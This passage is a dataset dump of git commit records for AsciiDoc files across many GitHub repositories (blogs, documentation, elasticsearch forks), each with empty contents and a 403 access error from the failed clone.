403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dffee7726199be4e05fd2460fda8ac0a6c659169","subject":"added wercker status","message":"added wercker status","repos":"mmjmanders\/algorithmicpasswords","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mmjmanders\/algorithmicpasswords.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0418718b082db912bd9f830fd95be76f4a210b97","subject":"add editor.backend.output.dir key","message":"add editor.backend.output.dir key\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31ba422a4865f7ae1fc74c23ef3fc0a6b086c1f3","subject":"Updated documentation","message":"Updated documentation\n","repos":"resilience4j\/resilience4j,goldobin\/resilience4j,RobWin\/circuitbreaker-java8,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"79c85dcace3447be0dbf79a2d8221671f33b0dbd","subject":"Update 2016-09-05-Information-Technology-1-What-is-a-network.adoc","message":"Update 2016-09-05-Information-Technology-1-What-is-a-network.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-05-Information-Technology-1-What-is-a-network.adoc","new_file":"_posts\/2016-09-05-Information-Technology-1-What-is-a-network.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84ac96845a3cd232b4d1d5b38e4a3e34707969d9","subject":"Update 2015-09-17-First-Blog.adoc","message":"Update 2015-09-17-First-Blog.adoc","repos":"tongqqiu\/tongqqiu.github.io,tongqqiu\/tongqqiu.github.io,tongqqiu\/tongqqiu.github.io","old_file":"_posts\/2015-09-17-First-Blog.adoc","new_file":"_posts\/2015-09-17-First-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tongqqiu\/tongqqiu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c79b9b35dbc1cc77f0e9ebc4d9bae1ff87e93767","subject":"Update 2016-02-12-Interface-are-awesome.adoc","message":"Update 2016-02-12-Interface-are-awesome.adoc","repos":"tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io","old_file":"_posts\/2016-02-12-Interface-are-awesome.adoc","new_file":"_posts\/2016-02-12-Interface-are-awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedroeloffzen\/tedroeloffzen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"c8fb27ff7070b6ae5325002ce2c80d520488e17e","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f1867f3a0a069b559ffdb28650bedc9a1072b0f","subject":"Update 2018-04-13-To-automate-analyzing-J-I-R-A.adoc","message":"Update 2018-04-13-To-automate-analyzing-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-To-automate-analyzing-J-I-R-A.adoc","new_file":"_posts\/2018-04-13-To-automate-analyzing-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2741f31c1b0e84415a311475f52e801ed8cab8de","subject":"y2b create post Is This The Coolest Keyboard Yet?","message":"y2b create post Is This The Coolest Keyboard Yet?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-18-Is-This-The-Coolest-Keyboard-Yet.adoc","new_file":"_posts\/2017-05-18-Is-This-The-Coolest-Keyboard-Yet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bd9db28a1c4068a4eafc0f7e8245475d35421db","subject":"Update 2017-09-18-Functional-Rotterdam-5th-Edition.adoc","message":"Update 2017-09-18-Functional-Rotterdam-5th-Edition.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2017-09-18-Functional-Rotterdam-5th-Edition.adoc","new_file":"_posts\/2017-09-18-Functional-Rotterdam-5th-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"636daeea33d6b114fe0a87b52f1fe5ede5cb8884","subject":"Update 2018-01-16-Azure-9.adoc","message":"Update 2018-01-16-Azure-9.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-16-Azure-9.adoc","new_file":"_posts\/2018-01-16-Azure-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"263607ba6acb4ba056daaf6cbc62384c056a0065","subject":"Publish 2013-5-12-Linux-Notes.adoc","message":"Publish 
2013-5-12-Linux-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"2013-5-12-Linux-Notes.adoc","new_file":"2013-5-12-Linux-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"452d2b202f2c63717088f982620e527311d14037","subject":"Update 2018-07-26-Scratch.adoc","message":"Update 2018-07-26-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-26-Scratch.adoc","new_file":"_posts\/2018-07-26-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fee5245c35e613f504b00b0c68c60c037e3ac566","subject":"Update 2018-02-19-Amazon-Echo.adoc","message":"Update 2018-02-19-Amazon-Echo.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da682bbe171c6a5b56c25592556fca55f8b519bd","subject":"Configuring fluentd (td-agent) to aggregate container logs","message":"Configuring fluentd (td-agent) to aggregate container logs\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"admin_guide\/aggregate_logging.adoc","new_file":"admin_guide\/aggregate_logging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e3b02be88f1b81461b28829dfcdb98580c6297e","subject":"Document rollback support","message":"Document rollback support\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/rollback.adoc","new_file":"docs\/rollback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"1b8191c587469da8e75ab4c1e5cbb48dfe2c19e9","subject":"Update 20161110-1328-have-fun.adoc","message":"Update 20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1328-have-fun.adoc","new_file":"_posts\/20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"a36fe8ea79c8da394fc913cf124dab7c0f831482","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dcae47426fd52ef4516dedd53cc888e0689fac0","subject":"1.4.3 release blog","message":"1.4.3 release blog\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2018-07-03-release-1.4.3.adoc","new_file":"_blog-src\/_posts\/2018-07-03-release-1.4.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e2b6929bcaeb5d0b796ebe4faad2d08a758bdd4","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"776ba2dc3b8bcba49ef8909f1991de87f60809f7","subject":"Update 2015-08-04-Hello-world.adoc","message":"Update 2015-08-04-Hello-world.adoc","repos":"GDGSriLanka\/blog,GDGSriLanka\/blog","old_file":"_posts\/2015-08-04-Hello-world.adoc","new_file":"_posts\/2015-08-04-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GDGSriLanka\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42515a36e66ce4655beb7aa18a73bd7244f0ef01","subject":"Update 2015-09-06-Second-Post.adoc","message":"Update 2015-09-06-Second-Post.adoc","repos":"glitched01\/glitched01.github.io,glitched01\/glitched01.github.io,glitched01\/glitched01.github.io","old_file":"_posts\/2015-09-06-Second-Post.adoc","new_file":"_posts\/2015-09-06-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/glitched01\/glitched01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e74bce2886e5727c3508783130dc6486f449e400","subject":"Update 2015-04-15-Development-environment.adoc","message":"Update 2015-04-15-Development-environment.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-04-15-Development-environment.adoc","new_file":"_posts\/2015-04-15-Development-environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"b115c0ac0f18d137de5d1ea24a014565d14e2c85","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76997e777a572fc566be932944b5fb422c66ae08","subject":"Update 2017-04-10-Indecisione.adoc","message":"Update 2017-04-10-Indecisione.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-10-Indecisione.adoc","new_file":"_posts\/2017-04-10-Indecisione.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1811851a9d6eb704f7f0c7ba48f1e347cfe8e048","subject":"Add Debugging flaky tests blog post","message":"Add Debugging flaky tests blog post\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2022-10-21-flaky-tests.adoc","new_file":"_posts\/2022-10-21-flaky-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25d7144ccedceb3f7c7fcb0b692eac5c8123a6b1","subject":"add to NOTES","message":"add to NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd606cc5b5e4d95496201587c3a0bc024c0aa637","subject":"scala file added","message":"scala file added\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Scala.adoc","new_file":"Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"d0642fb8195a48259fe2d52114cab0ea06b8f890","subject":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","message":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9b016bb8d96e1a099e176ab49153b1c5e77db97","subject":"add conj","message":"add 
conj\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojureconj.adoc","new_file":"content\/events\/2016\/clojureconj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2174c87c77398d0932af99cf4b8359c302663f51","subject":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","message":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f41915b163e318680be03ddd81437433cefe36f","subject":"Update 2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","message":"Update 2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94d6f63b488da392cc7e5b92cfe641c6399ee187","subject":"Initial shared infra proposal (#3455)","message":"Initial shared infra proposal (#3455)\n\n* Initial shared infra proposal\r\n\r\nIssue #3416","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design\/proposals\/shared-infrastructure.adoc","new_file":"documentation\/design\/proposals\/shared-infrastructure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c5b39ce85ed43e02ce99136c9ad73f51a202cb76","subject":"[DOCS] Fix broken inter-page link","message":"[DOCS] Fix broken inter-page 
link\n","repos":"Rygbee\/elasticsearch,alexshadow007\/elasticsearch,petabytedata\/elasticsearch,lmtwga\/elasticsearch,scorpionvicky\/elasticsearch,mnylen\/elasticsearch,dongjoon-hyun\/elasticsearch,vietlq\/elasticsearch,kunallimaye\/elasticsearch,maddin2016\/elasticsearch,nrkkalyan\/elasticsearch,kaneshin\/elasticsearch,btiernay\/elasticsearch,hafkensite\/elasticsearch,huanzhong\/elasticsearch,robin13\/elasticsearch,sposam\/elasticsearch,awislowski\/elasticsearch,lzo\/elasticsearch-1,jango2015\/elasticsearch,F0lha\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Siddartha07\/elasticsearch,mmaracic\/elasticsearch,infusionsoft\/elasticsearch,StefanGor\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,strapdata\/elassandra5-rc,springning\/elasticsearch,wbowling\/elasticsearch,sposam\/elasticsearch,bestwpw\/elasticsearch,alexshadow007\/elasticsearch,uschindler\/elasticsearch,franklanganke\/elasticsearch,Ansh90\/elasticsearch,sneivandt\/elasticsearch,naveenhooda2000\/elasticsearch,jpountz\/elasticsearch,kalburgimanjunath\/elasticsearch,rlugojr\/elasticsearch,knight1128\/elasticsearch,snikch\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mortonsykes\/elasticsearch,ZTE-PaaS\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,pritishppai\/elasticsearch,scorpionvicky\/elasticsearch,ckclark\/elasticsearch,zhiqinghuang\/elasticsearch,andrejserafim\/elasticsearch,Charlesdong\/elasticsearch,pritishppai\/elasticsearch,JSCooke\/elasticsearch,dpursehouse\/elasticsearch,MichaelLiZhou\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,AndreKR\/elasticsearch,onegambler\/elasticsearch,iacdingping\/elasticsearch,Stacey-Gammon\/elasticsearch,martinstuga\/elasticsearch,mbrukman\/elasticsearch,franklanganke\/elasticsearch,umeshdangat\/elasticsearch,fforbeck\/elasticsearch,mjason3\/elasticsearch,brandonkearby\/elasticsearch,masterweb121\/elasticsearch,obourgain\/elasticsearch,schonfeld\/elasticsearch,Charlesdong\/elasticsearch,Charlesdong\/elasticsearch,nomoa\/elasticsearch,hydro2k\/elasticsearch,cnfire\/elasticsearch-1,nellicus\/elasticsearch,ImpressTV\/elasticsearch,achow\/elasticsearch,naveenhooda2000\/elasticsearch,Stacey-Gammon\/elasticsearch,JSCooke\/elasticsearch,Brijeshrpatel9\/elasticsearch,clintongormley\/elasticsearch,bestwpw\/elasticsearch,fforbeck\/elasticsearch,MichaelLiZhou\/elasticsearch,pablocastro\/elasticsearch,huanzhong\/elasticsearch,strapdata\/elassandra5-rc,mm0\/elasticsearch,geidies\/elasticsearch,tebriel\/elasticsearch,lmtwga\/elasticsearch,hafkensite\/elasticsearch,dongjoon-hyun\/elasticsearch,rhoml\/elasticsearch,C-Bish\/elasticsearch,mm0\/elasticsearch,njlawton\/elasticsearch,cwurm\/elasticsearch,weipinghe\/elasticsearch,fred84\/elasticsearch,ImpressTV\/elasticsearch,slavau\/elasticsearch,winstonewert\/elasticsearch,JackyMai\/elasticsearch,njlawton\/elasticsearch,gingerwizard\/elasticsearch,xingguang2013\/elasticsearch,scottsom\/elasticsearch,trangvh\/elasticsearch,shreejay\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,njlawton\/elasticsearch,girirajsharma\/elasticsearch,andrestc\/elasticsearch,brandonkearby\/elasticsearch,awislowski\/elasticsearch,ckclark\/elasticsearch,Shepard1212\/elasticsearch,markharwood\/elasticsearch,JervyShi\/elasticsearch,adrianbk\/elasticsearch,snikch\/elasticsearch,kingaj\/elasticsearch,lmtwga\/elasticsearch,wangtuo\/elasticsearch,achow\/elasticsearch,wimvds\/elasticsearch,pranavraman\/elasticsearch,knight1128\/elasticsearch,bawse\/elasticsearch,rmuir\/elasticsearch,Ansh90\/elasticsear
ch,ZTE-PaaS\/elasticsearch,Charlesdong\/elasticsearch,dongjoon-hyun\/elasticsearch,lks21c\/elasticsearch,MetSystem\/elasticsearch,Uiho\/elasticsearch,cnfire\/elasticsearch-1,caengcjd\/elasticsearch,mohit\/elasticsearch,martinstuga\/elasticsearch,diendt\/elasticsearch,ivansun1010\/elasticsearch,mohit\/elasticsearch,rhoml\/elasticsearch,lzo\/elasticsearch-1,artnowo\/elasticsearch,wittyameta\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,iacdingping\/elasticsearch,hafkensite\/elasticsearch,coding0011\/elasticsearch,clintongormley\/elasticsearch,MichaelLiZhou\/elasticsearch,LewayneNaidoo\/elasticsearch,adrianbk\/elasticsearch,martinstuga\/elasticsearch,nrkkalyan\/elasticsearch,yongminxia\/elasticsearch,jbertouch\/elasticsearch,fred84\/elasticsearch,iamjakob\/elasticsearch,sc0ttkclark\/elasticsearch,GlenRSmith\/elasticsearch,xingguang2013\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,scottsom\/elasticsearch,weipinghe\/elasticsearch,djschny\/elasticsearch,Ansh90\/elasticsearch,franklanganke\/elasticsearch,xingguang2013\/elasticsearch,kalburgimanjunath\/elasticsearch,alexshadow007\/elasticsearch,wittyameta\/elasticsearch,strapdata\/elassandra5-rc,Collaborne\/elasticsearch,jprante\/elasticsearch,kalburgimanjunath\/elasticsearch,Charlesdong\/elasticsearch,yongminxia\/elasticsearch,apepper\/elasticsearch,mcku\/elasticsearch,spiegela\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sreeramjayan\/elasticsearch,onegambler\/elasticsearch,maddin2016\/elasticsearch,AndreKR\/elasticsearch,nazarewk\/elasticsearch,JSCooke\/elasticsearch,wimvds\/elasticsearch,vietlq\/elasticsearch,nezirus\/elasticsearch,huanzhong\/elasticsearch,polyfractal\/elasticsearch,huanzhong\/elasticsearch,elancom\/elasticsearch,rmuir\/elasticsearch,mohit\/elasticsearch,LewayneNaidoo\/elasticsearch,jchampion\/elasticsearch,himanshuag\/elasticsearch,rajanm\/elasticsearch,rento19962\/elasticsearch,shreejay\/elasticsearch,schonfeld\/elasticsearch,vroyer\/elassandra,masterweb121\/elasticsearch,jchampion\/elasticsearch,tahaemin\/elasticsearch,knight1128\/elasticsearch,drewr\/elasticsearch,snikch\/elasticsearch,fred84\/elasticsearch,jchampion\/elasticsearch,wittyameta\/elasticsearch,F0lha\/elasticsearch,wuranbo\/elasticsearch,zkidkid\/elasticsearch,nellicus\/elasticsearch,jbertouch\/elasticsearch,geidies\/elasticsearch,yongminxia\/elasticsearch,rlugojr\/elasticsearch,LeoYao\/elasticsearch,Brijeshrpatel9\/elasticsearch,strapdata\/elassandra,mcku\/elasticsearch,huanzhong\/elasticsearch,yynil\/elasticsearch,liweinan0423\/elasticsearch,vroyer\/elasticassandra,F0lha\/elasticsearch,beiske\/elasticsearch,kingaj\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ESamir\/elasticsearch,jeteve\/elasticsearch,gmarz\/elasticsearch,btiernay\/elasticsearch,kingaj\/elasticsearch,ckclark\/elasticsearch,GlenRSmith\/elasticsearch,himanshuag\/elasticsearch,mbrukman\/elasticsearch,franklanganke\/elasticsearch,tebriel\/elasticsearch,mmaracic\/elasticsearch,palecur\/elasticsearch,StefanGor\/elasticsearch,i-am-Nathan\/elasticsearch,karthikjaps\/elasticsearch,jimczi\/elasticsearch,Helen-Zhao\/elasticsearch,kingaj\/elasticsearch,hydro2k\/elasticsearch,andrejserafim\/elasticsearch,areek\/elasticsearch,ckclark\/elasticsearch,bestwpw\/elasticsearch,Collaborne\/elasticsearch,lzo\/elasticsearch-1,a2lin\/elasticsearch,F0lha\/elasticsearch,nrkkalyan\/elasticsearch,lmtwga\/elasticsearch,diendt\/elasticsearch,artnowo\/elasticsearch,hafkensite\/elasticsearch,wimvds\/elasticsearch,diendt\/elasticsearch,nazarewk\/elasticsearch,ThiagoGar
ciaAlves\/elasticsearch,rento19962\/elasticsearch,wittyameta\/elasticsearch,adrianbk\/elasticsearch,lks21c\/elasticsearch,pranavraman\/elasticsearch,qwerty4030\/elasticsearch,slavau\/elasticsearch,lydonchandra\/elasticsearch,elancom\/elasticsearch,tebriel\/elasticsearch,Shepard1212\/elasticsearch,robin13\/elasticsearch,weipinghe\/elasticsearch,kalburgimanjunath\/elasticsearch,gfyoung\/elasticsearch,ImpressTV\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,rlugojr\/elasticsearch,rmuir\/elasticsearch,AndreKR\/elasticsearch,kaneshin\/elasticsearch,lydonchandra\/elasticsearch,sdauletau\/elasticsearch,trangvh\/elasticsearch,JervyShi\/elasticsearch,winstonewert\/elasticsearch,rmuir\/elasticsearch,myelin\/elasticsearch,Rygbee\/elasticsearch,MisterAndersen\/elasticsearch,PhaedrusTheGreek\/elasticsearch,gmarz\/elasticsearch,drewr\/elasticsearch,pranavraman\/elasticsearch,strapdata\/elassandra5-rc,qwerty4030\/elasticsearch,slavau\/elasticsearch,ricardocerq\/elasticsearch,xuzha\/elasticsearch,LeoYao\/elasticsearch,mck